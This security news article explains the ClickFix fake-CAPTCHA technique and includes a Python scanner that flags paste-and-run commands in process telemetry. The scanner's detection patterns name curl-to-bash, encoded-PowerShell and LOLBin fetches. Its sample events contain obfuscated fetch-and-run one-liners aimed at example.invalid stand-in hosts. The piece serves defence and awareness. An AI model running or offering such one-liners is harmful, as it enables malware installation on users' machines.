Security researchers warn of ClickFix, a relatively new attack technique that slips past many endpoint protections on both macOS and Windows. It relies on social engineering rather than an exploit: the victim is talked into running a command, served from a compromised or attacker-run site, that downloads and installs credential-stealing malware with little or no warning from the system.
Campaigns often begin with an email that appears to come from a hotel about a pending reservation, a message on a popular app such as WhatsApp, or even a top result in a Google search. The lure is tailored to look trustworthy and to get the user to click a link and land on a malicious page.
On arrival, users are shown a CAPTCHA or similar "verify you are human" pretext that asks them to copy a short string, open a terminal or shell (on Windows, typically PowerShell or the Run dialog), paste it in, and press Enter. The string is a command: that single line contacts an attacker-controlled server and pulls down the next-stage payload.
Because the user ran the command themselves, nothing the system would normally flag as an unexpected download occurs, and the malware installs without visible signs. The usual result is an infostealer, though campaigns have also delivered malware that targets cryptocurrency wallets, bots that enlist the host in a botnet, and changes to macOS or Windows settings so the implant survives a reboot.
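The command the lure asks for leaves a distinctive trace in process telemetry: a shell or PowerShell started from a terminal or the Run dialog whose command line fetches something remote and pipes it straight into an interpreter, often wrapped in a base64 layer or followed by a reassuring "I am not a robot" comment. The scanner below is an added example written for this page, not code from any researcher or vendor mentioned here; the event format, the regexes and the sample records (with example.invalid URLs) are constructed assumptions for illustration, not vendor signatures or data from a real campaign.

```python
"""
Heuristic scanner for ClickFix-style paste-and-run commands in process telemetry.
Added example for this page: the event format, the regexes and the sample records
(with example.invalid URLs) are constructed for illustration, not vendor signatures
or data from a real campaign.
"""
import base64
import re

# Strong indicators in a command line (raw or decoded). Illustrative starting set.
FETCH_AND_RUN = re.compile(
    r"\b(curl|wget|iwr|irm|Invoke-WebRequest|Invoke-RestMethod)\b[^|;&]*\|\s*"
    r"(bash|sh|zsh|iex|Invoke-Expression)\b",
    re.IGNORECASE,
)
ENCODED_PS = re.compile(
    r"powershell(?:\.exe)?\b.*?\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE,
)
BASE64_TO_SHELL = re.compile(
    r"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(bash|sh|zsh|python3?)\b", re.IGNORECASE
)
LOLBIN_WITH_URL = re.compile(
    r"\b(mshta|rundll32|regsvr32|certutil)(?:\.exe)?\b.*https?://", re.IGNORECASE
)
# Fake-CAPTCHA lures often append a reassuring comment so the Run dialog or
# terminal shows "I am not a robot" text rather than what the command does.
LURE_TEXT = re.compile(r"(not a robot|captcha|verification id)", re.IGNORECASE)
# Parents a victim launches from when told to "press Win+R" or "open Terminal".
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe", "terminal", "iterm2"}


def decode_encoded_powershell(cmdline):
    """Return the decoded -EncodedCommand script (base64 of UTF-16LE) or None."""
    m = ENCODED_PS.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def decode_base64_fragments(cmdline):
    """Decode long base64 tokens so indicators hidden inside them are scanned too."""
    decoded = []
    for token in re.findall(r"[A-Za-z0-9+/]{20,}={0,2}", cmdline):
        try:
            decoded.append(base64.b64decode(token, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def analyze_event(event):
    """Return sorted reasons an event looks like ClickFix; an empty list means benign."""
    reasons = set()
    cmd = event["cmdline"]
    views = [cmd] + decode_base64_fragments(cmd)
    decoded_ps = decode_encoded_powershell(cmd)
    if decoded_ps is not None:
        reasons.add("encoded PowerShell command")
        views.append(decoded_ps)
    for text in views:
        if FETCH_AND_RUN.search(text):
            reasons.add("remote fetch piped into an interpreter")
        if BASE64_TO_SHELL.search(text):
            reasons.add("base64 decoded into a shell")
        if LOLBIN_WITH_URL.search(text):
            reasons.add("LOLBin launched with a URL")
    # Lure text and an interactive parent are weak on their own (developers pipe
    # curl into bash too), so they only enrich a hit rather than create one.
    if reasons:
        if LURE_TEXT.search(cmd):
            reasons.add("fake-CAPTCHA lure text in command")
        if event.get("parent", "").lower() in INTERACTIVE_PARENTS:
            reasons.add("launched from an interactive parent")
    return sorted(reasons)


def scan(events):
    """Return (index, reasons) for every event that trips at least one strong indicator."""
    return [(i, analyze_event(e)) for i, e in enumerate(events) if analyze_event(e)]


def ps_encoded(script):
    """Encode a script the way powershell -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed telemetry: three events that mimic ClickFix one-liners (one macOS,
# two Windows) plus two benign commands that must not be flagged.
SAMPLE_EVENTS = [
    {"host": "mac-01", "parent": "Terminal", "process": "bash",
     "cmdline": 'bash -c "echo '
                + base64.b64encode(b"curl -fsSL http://example.invalid/a | bash").decode()
                + ' | base64 -d | bash"'},
    {"host": "win-07", "parent": "explorer.exe", "process": "powershell.exe",
     "cmdline": "powershell -w hidden -ep bypass -enc "
                + ps_encoded("iwr http://example.invalid/x | iex")
                + ' # "I am not a robot - reCAPTCHA Verification ID: 7391"'},
    {"host": "win-07", "parent": "explorer.exe", "process": "mshta.exe",
     "cmdline": "mshta http://example.invalid/captcha.hta"},
    {"host": "mac-02", "parent": "Terminal", "process": "curl",
     "cmdline": "curl -fsSL https://example.invalid/release.tar.gz -o release.tar.gz"},
    {"host": "mac-02", "parent": "Terminal", "process": "git", "cmdline": "git pull --rebase"},
]

if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_EVENTS):
        e = SAMPLE_EVENTS[index]
        print(f"{e['host']}: {e['process']} (parent {e['parent']}) -> {', '.join(reasons)}")
```

Run it and the three lure-style events are reported with their reasons while the plain `curl -o` download and `git pull` are not. The design point is that the strong indicators are evaluated on every decoded view of the command line, because ClickFix one-liners routinely hide the real fetch behind `-EncodedCommand` or `base64 -d`; the weaker context (parent process, CAPTCHA wording) is only used to enrich a hit, which keeps ordinary developer use of `curl | bash` from flooding the queue.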
Researchers at CrowdStrike described a particularly polished ClickFix campaign that carried its main payload in a Mach-O binary, the native macOS executable format. It is a reminder that Gatekeeper is not a backstop here: Gatekeeper evaluates files that carry the quarantine attribute browsers set on downloads, and a binary fetched by a shell command such as curl and executed from the terminal never receives that attribute, so the user's one-line command sidesteps the check entirely. The researchers noted that the technique stays popular because it can be bolted onto any site that already draws traffic and installs malware with minimal user interaction.
Experts say malvertising combined with the one-line installation command is a persistent threat, and other campaigns have used the same playbook against Windows users. Endpoint security products help, but criminals keep finding ways around them, so awareness and cautious browsing remain an essential defense.
With the holiday season approaching and families spending more time online, researchers urge people to scrutinize unexpected messages, even ones that appear to come from trusted sources, and never to paste text into a terminal, Run dialog or command prompt unless they are certain where it came from and what it does.